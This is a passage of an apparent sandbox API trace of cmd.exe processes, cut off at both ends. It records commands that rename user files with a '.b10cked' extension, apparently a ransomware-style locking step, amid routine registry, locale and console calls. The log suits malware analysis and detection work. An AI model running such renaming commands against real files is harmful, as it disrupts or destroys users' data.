dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0217.890] GetConsoleOutputCP () returned 0x1b5 [0217.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.890] SetConsoleCtrlHandler (HandlerRoutine=0x49fee72a, Add=1) returned 1 [0217.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0217.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.891] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0217.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.891] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.891] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.891] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0217.891] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.891] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0217.891] GetEnvironmentStringsW () returned 0x320190* [0217.892] FreeEnvironmentStringsW (penv=0x320190) returned 1 [0217.892] GetEnvironmentStringsW () returned 0x320190* [0217.892] FreeEnvironmentStringsW (penv=0x320190) returned 1 [0217.892] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e954 | out: phkResult=0x26e954*=0x40) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0xb8, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x1, 
lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x1, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x0, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x40, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x40, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x40, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegCloseKey (hKey=0x40) returned 0x0 [0217.892] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e954 | out: phkResult=0x26e954*=0x40) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x40, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x1, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x1, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x0, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x9, lpcbData=0x26e958*=0x4) returned 0x0 [0217.893] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x9, lpcbData=0x26e958*=0x4) returned 0x0 [0217.893] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x9, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.893] RegCloseKey (hKey=0x40) returned 0x0 [0217.893] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b3 [0217.893] srand (_Seed=0x5b8863b3) [0217.893] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"" [0217.893] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"" [0217.893] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.893] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" 
(normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0217.893] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.893] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.894] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.894] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0217.894] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0217.894] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0217.894] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0217.894] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0217.894] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0217.894] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0217.894] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0217.894] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0217.894] GetEnvironmentStringsW () returned 0x3222e0* [0217.894] FreeEnvironmentStringsW (penv=0x3222e0) returned 1 [0217.894] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.894] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.894] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0217.894] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0217.894] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0217.894] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0217.894] _wcsicmp (_String1="KEYS", 
_String2="DATE") returned 7 [0217.894] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0217.894] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0217.894] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0217.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f720 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f720, lpFilePart=0x26f71c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f71c*="Desktop") returned 0x18 [0217.895] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.895] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f49c | out: lpFindFileData=0x26f49c) returned 0x320020 [0217.895] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0217.895] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f49c | out: lpFindFileData=0x26f49c) returned 0x320020 [0217.895] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0217.895] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f49c | out: lpFindFileData=0x26f49c) returned 0x320020 [0217.895] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0217.895] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.895] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0217.895] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0217.896] GetEnvironmentStringsW () returned 0x322b00* [0217.896] FreeEnvironmentStringsW (penv=0x322b00) returned 1 [0217.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.896] GetConsoleOutputCP () returned 0x1b5 [0217.896] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.896] GetUserDefaultLCID () returned 0x409 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ff4950, cchData=8 | out: lpLCData=":") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f860, cchData=128 | out: lpLCData="0") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f860, cchData=128 | out: lpLCData="0") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f860, cchData=128 | out: lpLCData="1") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ff4940, cchData=8 | out: lpLCData="/") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ff4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ff4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ff4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ff4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ff4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ff4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ff4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0217.898] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ff4930, cchData=8 | out: lpLCData=".") returned 2 [0217.898] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ff4920, cchData=8 | out: lpLCData=",") returned 2 [0217.898] setlocale (category=0, 
locale=".OCP") returned="English_United States.437" [0217.899] GetConsoleTitleW (in: lpConsoleTitle=0x3108e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.899] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.899] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0217.899] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0217.899] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0217.900] _wcsicmp (_String1="move", _String2=")") returned 68 [0217.900] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0217.900] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0217.900] _wcsicmp (_String1="IF", _String2="move") returned -4 [0217.900] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0217.900] _wcsicmp (_String1="REM", _String2="move") returned 5 [0217.900] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0217.903] GetConsoleTitleW (in: lpConsoleTitle=0x26f558, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.994] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0217.994] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0217.994] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0217.994] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0217.994] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0217.994] _wcsicmp (_String1="move", _String2="CD") returned 10 [0217.994] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0217.994] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0217.994] _wcsicmp (_String1="move", _String2="REN") returned -5 [0217.994] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0217.994] _wcsicmp (_String1="move", _String2="SET") returned -6 [0217.994] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0217.994] _wcsicmp 
(_String1="move", _String2="DATE") returned 9 [0217.995] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0217.995] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0217.995] _wcsicmp (_String1="move", _String2="MD") returned 11 [0217.995] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0217.995] _wcsicmp (_String1="move", _String2="RD") returned -5 [0217.995] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0217.995] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0217.995] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0217.995] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0217.995] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0217.995] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0217.995] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0217.995] _wcsicmp (_String1="move", _String2="VER") returned -9 [0217.995] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0217.995] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0217.995] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0217.995] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0217.995] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0217.995] _wcsicmp (_String1="move", _String2="START") returned -6 [0217.995] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0217.995] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0217.995] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0217.996] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.996] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.996] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f314, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f30c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f30c*=0x90c08a66, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp 
(_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0217.998] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0217.998] _wcsicmp (_String1="INDEXE~1.SEA", _String2=".") returned 59 [0217.998] _wcsicmp (_String1="INDEXE~1.SEA", _String2="..") returned 59 [0217.998] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA" (normalized: "c:\\users\\default\\searches\\indexe~1.sea")) returned 0x20 [0217.998] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.998] SetErrorMode (uMode=0x0) returned 0x0 [0217.998] SetErrorMode (uMode=0x1) returned 0x0 [0217.998] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", nBufferLength=0x104, lpBuffer=0x26ec9c, lpFilePart=0x26ec84 | out: lpBuffer="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", lpFilePart=0x26ec84*="INDEXE~1.SEA") returned 0x26 [0217.998] SetErrorMode (uMode=0x0) returned 0x1 [0217.998] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches" (normalized: 
"c:\\users\\default\\searches")) returned 0x13 [0217.998] _wcsicmp (_String1="INDEXE~1.SEA", _String2=".") returned 59 [0217.998] _wcsicmp (_String1="INDEXE~1.SEA", _String2="..") returned 59 [0217.998] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA" (normalized: "c:\\users\\default\\searches\\indexe~1.sea")) returned 0x20 [0217.999] SetErrorMode (uMode=0x0) returned 0x0 [0217.999] SetErrorMode (uMode=0x1) returned 0x0 [0217.999] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", nBufferLength=0x104, lpBuffer=0x26f118, lpFilePart=0x26eeb0 | out: lpBuffer="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", lpFilePart=0x26eeb0*="INDEXE~1.SEA") returned 0x26 [0217.999] SetErrorMode (uMode=0x0) returned 0x1 [0217.999] SetErrorMode (uMode=0x0) returned 0x0 [0217.999] SetErrorMode (uMode=0x1) returned 0x0 [0217.999] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked", nBufferLength=0x104, lpBuffer=0x26f320, lpFilePart=0x26eeb0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked", lpFilePart=0x26eeb0*="Indexed Locations.search-ms.b10cked") returned 0x3d [0217.999] SetErrorMode (uMode=0x0) returned 0x1 [0217.999] SetLastError (dwErrCode=0x0) [0217.999] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.b10cked")) returned 0xffffffff [0217.999] GetLastError () returned 0x2 [0217.999] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", fInfoLevelId=0x1, lpFindFileData=0x26e82c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e82c) returned 0x310e90 [0217.999] FindNextFileW (in: hFindFile=0x310e90, lpFindFileData=0x26e82c | out: lpFindFileData=0x26e82c) returned 0 [0218.000] GetLastError () returned 0x12 [0218.000] FindClose (in: hFindFile=0x310e90 | out: 
hFindFile=0x310e90) returned 1 [0218.000] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", fInfoLevelId=0x1, lpFindFileData=0x321bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bf8) returned 0x310e90 [0218.001] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked", nBufferLength=0x104, lpBuffer=0x26eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked", lpFilePart=0x0) returned 0x3d [0218.001] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", nBufferLength=0x104, lpBuffer=0x26eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", lpFilePart=0x0) returned 0x35 [0218.001] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms")) returned 0x20 [0218.001] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), lpNewFileName="C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms.b10cked"), dwFlags=0x3) returned 1 [0218.001] FindClose (in: hFindFile=0x310e90 | out: hFindFile=0x310e90) returned 1 [0218.001] _vsnwprintf (in: _Buffer=0x49ff5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26ea78 | out: _Buffer=" 1") returned 9 [0218.001] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.001] GetFileType (hFile=0x7) returned 0x2 [0218.002] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0218.002] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ea04 | out: lpMode=0x26ea04) returned 1 [0218.002] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.002] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, 
lpConsoleScreenBufferInfo=0x26ea38 | out: lpConsoleScreenBufferInfo=0x26ea38) returned 1 [0218.002] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a004640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0218.002] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a004640, nSize=0x2000, Arguments=0x26ea78 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0218.002] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a004640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26ea5c, lpReserved=0x0 | out: lpBuffer=0x4a004640*, lpNumberOfCharsWritten=0x26ea5c*=0x1a) returned 1 [0218.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.003] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0218.003] _get_osfhandle (_FileHandle=1) returned 0x7 [0218.003] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0218.003] _get_osfhandle (_FileHandle=0) returned 0x3 [0218.003] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0218.003] SetConsoleInputExeNameW () returned 0x1 [0218.003] GetConsoleOutputCP () returned 0x1b5 [0218.003] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0218.003] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.003] exit (_Code=0) Process: id = "559" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0x968" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\Administrator.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain 
